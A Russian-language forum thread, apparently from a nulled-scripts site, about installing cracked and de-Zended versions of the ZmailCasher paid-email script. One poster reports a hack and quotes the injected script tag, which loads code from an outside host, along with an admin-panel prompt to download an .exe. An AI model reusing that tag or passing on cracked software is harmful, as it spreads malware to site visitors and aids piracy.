Скрипт ZmailCasher v. 2.20 + плагины

Вот вам Zmail Casher 2.27 Final Null просто устанавливаете и наслаждаетесь и не надо ни чего в базах трогать уже все сделано!
Для просмотра ссылки Войди или Зарегистрируйся

:( Так под зендом он... не получаиццо установить! :bc:

Добавлено через 7 минут
Недавно нарыл ZmailCasher v.2.27 - полностью dezend, тока поставить не смог :(, синтаксические ошибки выдает, пхпшнику поработать еще надо (может кто займется и выложит поправленную версию)
*** скрытое содержание ***

попробовал скачать... 404 Not Found... перезалить можно?
 
взлом сайта на zmailcasher

Здравствуйте, может ктото сталкивался?
У меня взломали почтовик все имена пользователей заменены на вот такое <script src=http://zmfi.110mb.com/a></script>.
И в админке теперь посятонно сообщение просит скачать какойто .exe файл.
Как это делается совсем непонятно, и как от этого защититься
 
Нужно поставить обновление 2,27
 
Скорее всего взломали через файл .htaccess ищи там зло и сам файл .exe скорее всего тоже среди других фалов.

Добавлено через 1 минуту
Кто скачивал 3.0? Здесь нет ограничения, а при нажатии на ссылку просит 20 публикаций.

---------- Post added at 01:17 ---------- Previous post was Вчера at 23:35 ----------

Вообще не красиво!!! Прям кидалово! Сначала просила 20 сообщений и не пускала на страницу, а там для скачивания аообще 50 сообщений надо!!!! Ну не ожидал такого от Nulled.
 
Скрипт довольно интересный из описания, только вот эти зенды, дезенды блин!
Скажите, а как с самого начала искать рекламодателей? Вообще я ищу нечто подобное, но для зарабатывания на ссылках, баннерах... типа сапы, блогуна... Может кто видел?
 
Помогите с установкой zmailcasher 3.0 не могу установить дает просто чистый лист и все!
 
Назад
Сверху